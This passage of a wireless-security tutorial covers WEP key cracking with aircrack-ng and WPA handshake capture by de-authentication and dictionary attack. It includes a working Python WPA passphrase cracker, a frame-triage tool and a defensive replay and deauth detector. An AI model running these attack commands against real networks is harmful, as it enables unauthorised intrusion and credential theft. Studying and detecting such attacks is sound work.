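    raise ValueError(f"key descriptor version {version} (AES-CMAC) not handled here")


def crack(handshake, wordlist):
    """Return the passphrase whose derived KCK validates the captured message-2 MIC, else None."""
    eapol2 = handshake["eapol2"]
    snonce = eapol2[SNONCE_OFFSET:SNONCE_OFFSET + 32]
    mic = eapol2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, handshake["ssid"])
        kck = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"], handshake["anonce"], snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol2), mic):
            return word
    return None


# --- constructed handshake: stand-in for the frames airodump-ng would have saved ---

def build_eapol2(snonce, version=2):
    """EAPOL-Key message 2 layout (RSN descriptor) with the MIC field left zero."""
    key_info = 0x0108 | version                               # MIC bit | pairwise | descriptor version
    body = (bytes([2]) + struct.pack(">HHQ", key_info, 0, 1) + snonce
            + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0))
    return bytes([1, 3]) + struct.pack(">H", len(body)) + body   # EAPOL version 1, type EAPOL-Key


def constructed_handshake(passphrase="Workshop2009", ssid="Workshop"):
    """Assumed passphrase and nonces; MACs are the ones in the paper's aireplay-ng output."""
    ap_mac, sta_mac = bytes.fromhex("001b2f3dcbd6"), bytes.fromhex("001a7337e2a3")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    eapol2 = build_eapol2(snonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    eapol2 = eapol2[:MIC_OFFSET] + eapol_mic(kck, eapol2) + eapol2[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "eapol2": eapol2}


if __name__ == "__main__":
    hs = constructed_handshake()
    print(crack(hs, ["password", "12345678", "Workshop2009"]))   # Workshop2009
```

Because the SSID is the PBKDF2 salt, a PMK table is only reusable against networks with the same name; that is why precomputation in the suite (airolib-ng) is keyed by ESSID, and why a non-default SSID already blunts rainbow-table style attacks.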
#################################################################
[0x04] - Owned the WEP Key with Simple Technique (No Injection)
#################################################################
WEP is practically a dead method for protecting a network from unauthorized access. There are several ways to crack a WEP k
First of all, we should prepare a device which supports monitor mode and can inject packets into the network.
After that we prepare the cracking tools; we chose aircrack-ng in BackTrack 3 final on VMware.
OK, let's be clear about the concept of cracking WEP.
The main idea is to collect as many encrypted packets as fast as we can and then use these packets to crack the W
(Each data frame carries its own 24-bit IV in the clear, and it is the collection of distinct IVs that the statistical attacks feed on.)
So there are two situations arising from the above idea.
1. The network has high traffic.
2. The network has low traffic.
What's the difference between them?
In the first case, we use only airodump-ng to collect packets and crack the key, but in the second case
we have to inject packets in order to capture more packets. We introduce the capturing and cracking method first.
Then we talk about the injection method, which is needed only on a low-traffic network.
++++++++++++++++++++++++++++
[0x04a] - Capturing method
++++++++++++++++++++++++++++
First, we introduce the way to collect packets. For a 64-bit WEP key we use about 50,000 IVs and
about 150,000 IVs for a 128-bit WEP key (these figures assume the PTW attack; the older FMS/KoreK attacks need far more).
The command for collecting packets is
#airodump-ng -w workshop rausb0
------------------------------------------------------------------------------------------
[ CH 11 ][ Elapsed: 16 mins ][ 2009-02-23 21:21 ][ Decloak: xx:xx:xx:xx:xx:xx
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx 77 94 10905 11054 0 11 54. WEP WEP OPN Workshop
BSSID STATION PWR Rate Lost Packets Probes
xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy 85 54-54 0 7747
------------------------------------------------------------------------------------------
We will get the file "workshop-01.cap", used for cracking the key later.
We can estimate the number of usable packets from the #Data column; around 90% of the packets counted there are the IV p
+++++++++++++++++++++++++++
[0x04b] - Cracking method
+++++++++++++++++++++++++++
After we have collected enough encrypted packets (IVs), we use aircrack-ng to recover the key.
#aircrack-ng -b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of the target access point. aircrack-ng can be left running while airodump-ng keeps writing the file; it restarts the attack every 5000 new IVs, as the output below shows.
The successful cracking result is following:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
#########################################################################
[0x05] - Owned the WEP Key with Advanced Technique (With Inject Method)
#########################################################################
This method is not necessary on a high-traffic network, but it is very important on a low-traffic network. The idea behind this
we have to inject a packet to force the access point to generate a new packet back to the client. The new packet contains a new IV.
If we think carefully about the above idea, the source MAC address must be associated, the packet must be sent from the client to the acc
and the packet must cause the access point to produce a response or another packet; normally we should pick a packet which has a broa
We can summarise the requirements for the chosen injection packet as follows.
- The source MAC address is associated with the access point (we can arrange this by fake authentication).
- Sent from the client to the access point (the "To DS" flag is set to 1).
- The destination MAC address is broadcast (FF:FF:FF:FF:FF:FF).
The well-known packet which covers all requirements is the ARP request broadcast. In the aircrack-ng suite, there is aireplay-
- The network has ARP requests.
- The network has no ARP requests.
No matter which case we face, the important thing to realise is that we have to perform the injection with an associa
Now we have two choices. The first is to change our MAC address to an associated MAC address; the second is to do fake authenti
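How the facts used in 0x02a, 0x02b and in the injection requirements above are read out of raw 802.11 frames, as an added example (not the paper's code, not aircrack-ng's): an association request leaks the SSID that a beacon hides, data frames leak which client MACs are associated (what MAC-filter bypass and fake authentication need), and a data frame qualifies as an ARP-replay source only when ToDS=1, the Protected bit is set and the destination is broadcast. All frames are constructed in the file; the BSSID and station MAC are the ones in the paper's aireplay-ng output, the wired host MAC is made up, and radiotap/pcap parsing of a real capture is out of scope.

```python
"""802.11 frame triage: hidden SSIDs, associated stations, injectable frames.

Added example, not from the CWH paper and not aircrack-ng code. Frames are
constructed below; a real capture would come from airodump-ng's .cap file.
"""
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
FIXED_LEN = {0: 4, 5: 12, 8: 12}   # assoc request, probe response, beacon: fixed bytes before the IEs


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))


def parse_header(frame):
    """Decode the 24-byte MAC header; None for control frames and runts."""
    if len(frame) < 24:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype == 1:                                   # control frames have other layouts
        return None
    flags = frame[1]
    to_ds, from_ds, protected = bool(flags & 0x01), bool(flags & 0x02), bool(flags & 0x40)
    addrs = [mac_str(frame[i:i + 6]) for i in (4, 10, 16)]
    body = frame[30:] if (to_ds and from_ds) else frame[24:]   # WDS frames carry a 4th address
    return ftype, subtype, to_ds, from_ds, protected, addrs, body


def ssid_element(subtype, body):
    """Walk the tagged parameters after the fixed fields; return the SSID IE value or None."""
    off = FIXED_LEN[subtype]
    while off + 2 <= len(body):
        tag, length = body[off], body[off + 1]
        if tag == 0:
            return body[off + 2: off + 2 + length]
        off += 2 + length
    return None


def triage(frames):
    """networks: BSSID -> SSID, or '<length: n>' the way airodump-ng prints a hidden one;
    stations: BSSID -> set of client MACs; replayable: data frames fit for aireplay-ng -3."""
    networks, stations, replayable = {}, {}, []
    for frame in frames:
        parsed = parse_header(frame)
        if parsed is None:
            continue
        ftype, subtype, to_ds, from_ds, protected, (a1, a2, a3), body = parsed
        if ftype == 0 and subtype in (5, 8):             # beacon / probe response: a3 = BSSID
            ssid = ssid_element(subtype, body) or b""
            if ssid.strip(b"\x00"):
                networks[a3] = ssid.decode(errors="replace")
            else:                                         # hidden: only the length leaks
                networks.setdefault(a3, f"<length: {len(ssid)}>")
        elif ftype == 0 and subtype == 0:                 # association request: a2 = client, a3 = BSSID
            ssid = ssid_element(0, body)
            if ssid:
                networks[a3] = ssid.decode(errors="replace")
            stations.setdefault(a3, set()).add(a2)
        elif ftype == 2 and to_ds != from_ds:             # infrastructure data frame
            bssid, client, dest = (a1, a2, a3) if to_ds else (a2, a1, a1)
            stations.setdefault(bssid, set()).add(client)
            if to_ds and protected and dest == BROADCAST:
                replayable.append(frame)
    return networks, stations, replayable


# --- constructed frames ---

def _header(fc0, flags, a1, a2, a3):
    return bytes([fc0, flags, 0, 0]) + mac_bytes(a1) + mac_bytes(a2) + mac_bytes(a3) + bytes(2)


def beacon(bssid, ssid):
    fixed = bytes(8) + struct.pack("<HH", 100, 0x0411)         # timestamp, interval, capabilities (privacy set)
    return _header(0x80, 0x00, BROADCAST, bssid, bssid) + fixed + bytes([0, len(ssid)]) + ssid + bytes([1, 1, 0x82])


def assoc_request(client, bssid, ssid):
    fixed = struct.pack("<HH", 0x0411, 10)                     # capabilities, listen interval
    return _header(0x00, 0x00, bssid, client, bssid) + fixed + bytes([0, len(ssid)]) + ssid


def data_frame(src, bssid, dst, to_ds=True, protected=True, payload=bytes(36)):
    flags = (0x01 if to_ds else 0x02) | (0x40 if protected else 0x00)
    a1, a2, a3 = (bssid, src, dst) if to_ds else (dst, bssid, src)
    return _header(0x08, flags, a1, a2, a3) + payload


AP, CLIENT = "00:1b:2f:3d:cb:d6", "00:1a:73:37:e2:a3"        # from the paper's output
WIRED = "00:50:56:c0:00:08"                                     # constructed wired host
FRAMES = [
    beacon(AP, bytes(8)),                                   # hidden SSID: airodump-ng shows <length: 8>
    data_frame(WIRED, AP, CLIENT, to_ds=False),             # AP -> client: reveals the client MAC only
    assoc_request(CLIENT, AP, b"Workshop"),                 # re-association after deauth: SSID in the clear
    data_frame(CLIENT, AP, BROADCAST),                      # WEP ARP request from an associated client
    data_frame(CLIENT, AP, WIRED),                          # unicast: the AP will not re-broadcast it
    data_frame(CLIENT, AP, BROADCAST, protected=False),     # open network: nothing to crack
]

if __name__ == "__main__":
    print(triage(FRAMES))
```

Of the six constructed frames only the fourth survives the three checks; the beacon alone yields `<length: 8>` and the association request is what turns that into `Workshop`, which is exactly the sequence the deauth in 0x02b provokes.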
++++++++++++++++++++++++
[0x05a] - Monitor Mode
++++++++++++++++++++++++
Use airmon-ng to set your wifi card to monitor mode and prepare it for packet injection.
#airmon-ng start wlan0 11
This sets wlan0 to monitor mode on channel 11; we must specify the same channel as the target AP. (Newer airmon-ng versions create a separate monitor interface, mon0 or wlan0mon, and the commands below must then use that name instead of the physical interface.)
+++++++++++++++++++++++++++++++
[0x05b] - Fake Authentication
+++++++++++++++++++++++++++++++
We can do fake authentication with the following command.
#aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-a xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card (it must be the card's actual MAC, otherwise the AP's ACKs never reach us)
If we get a successful result, our MAC address is associated with that access point. (The 0 is the re-association delay; a non-zero value re-authenticates periodically, which helps when the AP drops idle associations.)
The successful result look like:
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine what type of network we are faced with and pick the appropri
+++++++++++++++++++++++++++++
[0x05c] - Arp Replay Attack
+++++++++++++++++++++++++++++
We can run the ARP replay attack with the following command.
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
-b xx:xx:xx:xx:xx:xx is the MAC address of the access point
-h yy:yy:yy:yy:yy:yy is the MAC address of our wireless card
Aireplay-ng will detect an ARP request and use it to perform the replay attack automatically.
The response will look like the following once it finds an ARP request. Keep airodump-ng writing to a file in another terminal: it is airodump-ng, not aireplay-ng, that saves the replies carrying the new IVs.
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
** In some cases, there is no ARP request broadcast on the network, so we cannot use the normal ARP replay attac
We have to generate a keystream from a captured packet, use that keystream to forge an ARP request packet and then replay it to
in order to generate new IV packets. There are two ways to generate the keystream, called "chopchop attack" and "fragme
Both methods can be performed by aireplay-ng.
++++++++++++++++++++++++++++++++
[0x05d] - Fragmentation Attack
++++++++++++++++++++++++++++++++
The fragmentation attack is used to obtain a keystream of up to 1500 bytes. So we can use this keystream to create a
which has a size of up to 1500 bytes. The command for the fragmentation attack is
#aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
We have to answer "y"
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++
[0x05e] - Korek ChopChop Attack
+++++++++++++++++++++++++++++++++
KoreK developed a tricky attack method called chopchop. It requires only one encrypte
to get a keystream, which we then use to generate an ARP request packet and finally perform the ARP replay attack.
We are able to use the chopchop attack with this command.
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet to decrypt. We can choose any packet whose BSSID matches our target. (Chopchop works backwards one byte at a time from the end of the frame, as the "Offset" lines below show; whether the AP relays or drops each guessed frame is the oracle.)
The response from the command looks like this:
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
And we will answer by typing "y" like this
---------------------
Use this packet ? y
---------------------
And then the system do the decrypting
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
6 of 12 12/24/10 5:48 PM
7. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
This process produces two files: the .xor file holds the recovered keystream (PRGA) and the .cap file holds the decrypted packet.
+++++++++++++++++++++++
[0x05f] - Packetforge
+++++++++++++++++++++++
Create an encrypted packet from the PRGA (.xor file) obtained with the chopchop or fragmentation attack.
#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y re
The result is:
----------------------
Wrote packet to: arp
----------------------
This command gives us an ARP request packet in the file named "arp".
++++++++++++++++++++++++++++++++++++++++++++++++++++++
[0x05g] - ARP Request Replay with Interactive Attack
++++++++++++++++++++++++++++++++++++++++++++++++++++++
We use aireplay-ng to inject the ARP request packet toward the access point with the following command.
#aireplay-ng -2 -r arp rausb0
The response will look like:
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
We answer "y":
---------------------
Use this packet ? y
---------------------
aireplay-ng starts injecting the packet.
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
++++++++++++++++++++++++++++
[0x05h] - Cracking WEP Key
++++++++++++++++++++++++++++
After we have collected enough encrypted packets (IV packets), we use aircrack-ng to recover the key.
#aircrack-ng -z capture1.cap (PTW attack)
A successful cracking result looks like this:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
##############################################
[0x06] - Conclusion Scripts for Cracking WEP
##############################################
Note: $AP is the access point's MAC address
$WIFI is the Wi-Fi card's MAC address
- airmon-ng start wlan0 11 (the monitor-mode channel must be specified)
- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
If that does not work, try #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap
** This method also works for cracking WEP when no client is associated (clientless).
#########################################
[0x07] - Owned the WPA-PSK/WPA2-PSK Key
#########################################
PSK stands for Pre-Shared Key. These mechanisms were designed to fix the WEP vulnerabilities,
so the key cannot be recovered with the same methods used against WEP. The only way to recover a WPA-PSK or WPA2-PSK key is to capture
the four-way handshake and crack it with a dictionary attack.
The idea for cracking a pre-shared key is to collect the four-way handshake packets. We are able to do this by de-authenticating, as
this forces the client to re-authenticate and we can capture the four-way handshake during that process. The command for this is as follows:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
Assume the handshake was captured into the workshop.cap file; we then run aircrack-ng against it.
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
A successful result looks like this.
--------------------------------------------------------------------------------
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------
This result shows that the WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".
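A monitor-side detector, added here as an example and not part of the paper, for the two injection behaviours shown above: the replayed ARP request of section 0x05g (step 6 of the 0x06 script), whose injected copies all carry the same WEP IV, and the directed de-authentication burst of section 0x07. The frame layout follows the paper's aireplay-ng dump; the thresholds, the MAC roles, the 20 ms deauth spacing and the reason code are assumptions.

```python
import struct
from collections import Counter, defaultdict, deque
# Detection tuning for this demonstration (constructed values, not from the paper).
DEAUTH_THRESHOLD = 10      # deauth frames from one sender inside WINDOW seconds
WINDOW = 1.0
IV_REPLAY_THRESHOLD = 50   # copies of one (sender, IV) pair before alerting

def parse(frame):
    """Split an 802.11 frame into header fields; None if shorter than a header.
    Handles 3-address frames only (no WDS/4-address frames)."""
    if len(frame) < 24: return None
    fc0, flags = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 3, fc0 >> 4
    hdr = 26 if ftype == 2 and subtype & 8 else 24      # QoS data adds 2 bytes
    mac = lambda off: frame[off:off + 6].hex(":")
    return {"type": ftype, "subtype": subtype, "flags": flags, "addr1": mac(4),
            "addr2": mac(10), "addr3": mac(16), "body": frame[hdr:]}

def detect(frames):
    """frames: iterable of (timestamp_seconds, raw_frame). Returns alert strings."""
    alerts, alerted = [], set()
    deauth_times, iv_seen = defaultdict(deque), Counter()
    for ts, raw in frames:
        p = parse(raw)
        if p is None: continue
        src = p["addr2"]
        if p["type"] == 0 and p["subtype"] == 12:          # management: deauthentication
            q = deauth_times[src]
            q.append(ts)
            while ts - q[0] > WINDOW:                      # keep only the last WINDOW seconds
                q.popleft()
            if len(q) >= DEAUTH_THRESHOLD and src not in alerted:
                alerted.add(src)
                reason = struct.unpack("<H", p["body"][:2])[0]
                alerts.append(f"deauth flood from {src} to {p['addr1']} (reason {reason})")
        elif p["type"] == 2 and p["flags"] & 0x40:        # data frame with Protected bit set
            iv = p["body"][:3].hex()                        # WEP: the 3-byte IV leads the body
            iv_seen[(src, iv)] += 1
            if iv_seen[(src, iv)] == IV_REPLAY_THRESHOLD:
                alerts.append(f"IV {iv} replayed {IV_REPLAY_THRESHOLD}x by {src}")
    return alerts

# The injected frame from the paper's aireplay-ng dump (ToDS=1, WEP bit, IV 55bce6).
REPLAYED_ARP = bytes.fromhex("08410201001b2f3dcbd6002127c00771" "ffffffffffff800155bce6002e4ea334"
    "a2b3fc4abb8b24c426184f26fdf76c3b" "ef7a2a365dbb252c8c0c8764632d537e" "66bf700e")

def deauth_frame(dst, src, bssid, reason=7):
    """Minimal deauthentication frame (constructed sample; reason code chosen arbitrarily)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    return (bytes([0xC0, 0x00, 0x3A, 0x01]) + mac(dst) + mac(src) + mac(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))

def sample_trace():
    """Constructed capture: 64 directed deauths 20 ms apart, then 500 identical replays."""
    ap, client = "00:1b:2f:3d:cb:d6", "00:21:27:c0:07:71"
    trace = [(i * 0.02, deauth_frame(client, ap, ap)) for i in range(64)]
    trace += [(10 + i * 0.002, REPLAYED_ARP) for i in range(500)]
    return trace
```

On a real capture, feed `detect()` the (timestamp, frame) pairs after stripping the radiotap header; a flood of identical IVs from one station is the replay signature, since the AP re-encrypts each relayed copy with a fresh IV but the injector never does.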
#############################################################
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################
Most companies have turned to public-key (certificate-based) authentication for their wireless networks and believe
it is perfectly safe. An attacker can still attack such a deployment by spoofing the certificate.
This method takes advantage of client incaution: many clients accept a certificate
without checking whether it is genuine. This lets the attacker impersonate
the RADIUS server and log the credentials of victims.
We can use FreeRADIUS as the fake RADIUS server, combined with the WPE patch, which enables logging of credential
information on the FreeRADIUS server.
Additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
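As an added example (not from the paper), a small audit of wpa_supplicant network blocks for exactly the client-side weakness described above: an enterprise profile with no ca_cert and no server-name match will complete EAP against any RADIUS server that presents a certificate. The two configuration blocks, the SSID, the CA file path and the domain are constructed.

```python
import re

# Two constructed wpa_supplicant network blocks for the same enterprise SSID. The
# first accepts any RADIUS certificate (the client incaution the section describes);
# the second pins the CA and the expected server name. All names are made up.
WEAK_CONF = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="s3cret"
    phase2="auth=MSCHAPV2"
}
"""
HARDENED_CONF = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="s3cret"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""
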